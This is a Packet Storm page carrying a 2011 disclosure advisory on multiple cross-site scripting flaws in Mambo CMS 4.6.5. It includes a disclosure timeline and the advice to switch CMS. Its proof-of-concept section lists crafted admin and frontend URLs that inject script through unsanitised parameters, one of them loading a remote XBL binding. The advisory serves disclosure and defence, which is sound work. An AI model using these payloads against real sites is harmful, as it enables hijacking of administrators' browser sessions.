exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mambo CMS 4.6.5 Cross Site Scripting

Mambo CMS 4.6.5 Cross Site Scripting
Posted Jun 27, 2011
Authored by Aung Khant | Site yehg.net

Mambo CMS version 4.6.5 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 3115d8f2dda73e067544bc4308b91b5481d3aad2070d6ec661b2e00ae86dc2f6
Download | Favorite | View

Mambo CMS 4.6.5 Cross Site Scripting

Change Mirror Download
Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's "power in
simplicity" also makes it the CMS of choice for many small businesses
and personal sites.


3. VULNERABILITY DESCRIPTION

Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)


5. PROOF-OF-CONCEPT/EXPLOIT

FrontEnd
==============

param: task

http://attacker.in/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32


BackEnd
==============

param: menu

http://attacker.in/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20


param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS
http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS


param: zorder

http://attacker.in/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent


param: search

http://attacker.in/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment


param: client

http://attacker.in/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on "banner" link


param: section  [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2


6. SOLUTION

The vendor seems to discontinue the development. It is recommended to
use another CMS in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-06-27]

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close